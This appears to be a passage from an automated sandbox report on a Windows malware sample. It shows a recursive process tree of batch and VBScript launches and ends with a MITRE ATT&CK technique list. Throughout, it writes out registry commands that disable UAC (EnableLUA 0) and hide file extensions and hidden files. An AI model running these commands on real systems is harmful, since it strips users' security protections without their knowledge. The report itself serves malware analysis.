C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yIQEwgoM.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
58⤵
PID:3780

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
59⤵
PID:4788

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
56⤵
PID:4516

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
56⤵
PID:2824

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
56⤵
- Modifies registry key
PID:1512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uEoAYcYs.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
56⤵
PID:3964

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
57⤵
PID:3828

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
54⤵
- Modifies visibility of file extensions in Explorer
PID:1788

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
54⤵
PID:2200

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
54⤵
- UAC bypass
PID:2192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YaUUgEkI.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
54⤵
PID:1412

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
55⤵
PID:4372

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
52⤵
PID:3624

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
52⤵
PID:4852

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
52⤵
- UAC bypass
PID:5028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kGIYYQYA.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
52⤵
PID:3012

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
53⤵
PID:5096

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
50⤵
- Modifies visibility of file extensions in Explorer
PID:3204

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
50⤵
PID:4676

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
50⤵
PID:2540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TmcoMoMM.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
50⤵
PID:3520

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
51⤵
PID:4208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
48⤵
- Modifies visibility of file extensions in Explorer
PID:2616

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
48⤵
PID:2000

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
48⤵
- UAC bypass
PID:4844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dkcwcAcQ.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
48⤵
PID:4500

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
49⤵
PID:1572

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
46⤵
- Modifies visibility of file extensions in Explorer
PID:4968

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
46⤵
PID:1744

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
46⤵
- UAC bypass
- Modifies registry key
PID:1320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DwAQIUcQ.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
46⤵
PID:3212

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
47⤵
PID:3548

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
47⤵
PID:4952

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
44⤵
- Modifies visibility of file extensions in Explorer
PID:3416

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
44⤵
PID:4424

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
44⤵
- UAC bypass
- Modifies registry key
PID:4960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nOgYwIUA.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
44⤵
PID:2612

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
45⤵
PID:688

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
42⤵
- Modifies visibility of file extensions in Explorer
PID:3240

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
42⤵
PID:2444

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
42⤵
- UAC bypass
- Modifies registry key
PID:1620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yyIcQwQw.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
42⤵
PID:4132

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
43⤵
PID:4820

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
40⤵
PID:4208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
40⤵
- Modifies registry key
PID:2284

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
41⤵
PID:768

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
40⤵
- UAC bypass
PID:3684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kkcYokQI.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
40⤵
PID:548

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
41⤵
PID:4188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
38⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4456

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
38⤵
PID:1044

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
38⤵
PID:1396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UMwYcEQQ.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
38⤵
PID:3144

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
39⤵
PID:2488

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
36⤵
PID:4348

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
36⤵
- Modifies registry key
PID:4660

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
36⤵
- UAC bypass
PID:4544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jgYEYoEs.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
36⤵
PID:4524

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
37⤵
PID:4788

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
34⤵
- Modifies visibility of file extensions in Explorer
PID:760

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
34⤵
PID:3052

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
34⤵
- UAC bypass
- Modifies registry key
PID:4972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xeoEQMYw.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
34⤵
PID:916

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
35⤵
PID:3548

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
32⤵
- Modifies visibility of file extensions in Explorer
PID:1244

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
32⤵
PID:1540

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
32⤵
PID:4424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XeIMkMkI.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
32⤵
PID:1028

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
33⤵
PID:3660

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
30⤵
PID:996

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
30⤵
PID:3692

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
30⤵
- UAC bypass
- Modifies registry key
PID:5116

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
31⤵
PID:552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\miEQQcAI.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
30⤵
PID:3000

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
31⤵
PID:1604

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
31⤵
PID:4848

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
28⤵
- Modifies registry key
PID:768

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
28⤵
PID:548

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
28⤵
- UAC bypass
PID:3972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\keMccwwA.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
28⤵
PID:1620

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
29⤵
PID:4964

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
26⤵
PID:100

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
26⤵
PID:3432

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
26⤵
PID:3652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CMUkcIEE.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
26⤵
PID:3172

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
27⤵
PID:752

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
24⤵
PID:4544

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
24⤵
PID:4768

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
24⤵
- UAC bypass
PID:3064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IMIcwsco.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
24⤵
PID:4512

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
25⤵
PID:2100

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
22⤵
- Modifies visibility of file extensions in Explorer
PID:916

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
22⤵
PID:2372

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
22⤵
PID:4480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tkAAUEkM.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
22⤵
PID:1704

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
23⤵
PID:1320

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
20⤵
- Modifies visibility of file extensions in Explorer
PID:5096

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
20⤵
PID:3424

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
20⤵
PID:1244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FkQsoMgg.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
20⤵
PID:5104

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
21⤵
PID:4372

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
18⤵
- Modifies visibility of file extensions in Explorer
PID:368

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
18⤵
PID:1604

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
18⤵
- UAC bypass
PID:552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NwwwoAcw.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
18⤵
PID:1916

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
19⤵
PID:3208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
16⤵
- Modifies visibility of file extensions in Explorer
PID:816

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
16⤵
- Modifies registry key
PID:4832

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
16⤵
- UAC bypass
PID:2544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eQMEQEAk.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
16⤵
PID:5004

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
17⤵
PID:2092

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
14⤵
PID:224

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
14⤵
- Modifies registry key
PID:2540

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
14⤵
PID:3560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ESQwUUgU.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
14⤵
PID:1328

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
15⤵
PID:3520

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
12⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3184

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
12⤵
PID:3064

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
12⤵
- UAC bypass
PID:3204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cMkAgcQE.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
12⤵
PID:3344

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
13⤵
PID:2112

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
10⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3280

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
10⤵
- Modifies registry key
PID:4696

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
10⤵
PID:4896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VoAoYUUQ.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
10⤵
PID:4972

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
11⤵
PID:1392

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
8⤵
PID:4424

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
8⤵
- Modifies registry key
PID:5104

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
8⤵
- UAC bypass
PID:1276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lEgUoYko.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
8⤵
PID:1028

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
9⤵
PID:1540

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
6⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1604

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
6⤵
PID:3980

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
6⤵
PID:4964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EewocYos.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
6⤵
PID:1516

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
7⤵
PID:4504

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
4⤵
- Modifies visibility of file extensions in Explorer
PID:812

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
4⤵
PID:1688

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:5004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ooMssMMU.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
4⤵
- Suspicious use of WriteProcessMemory
PID:3232

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
5⤵
PID:2764

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
2⤵
- Modifies visibility of file extensions in Explorer
PID:1268

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
2⤵
PID:220

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
2⤵
PID:232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uOYwocQI.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:3652

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
3⤵
PID:884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4068

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv W+Et/Nu450ySxSXPcUf1xw.0.2
1⤵
PID:4676

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:2112

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

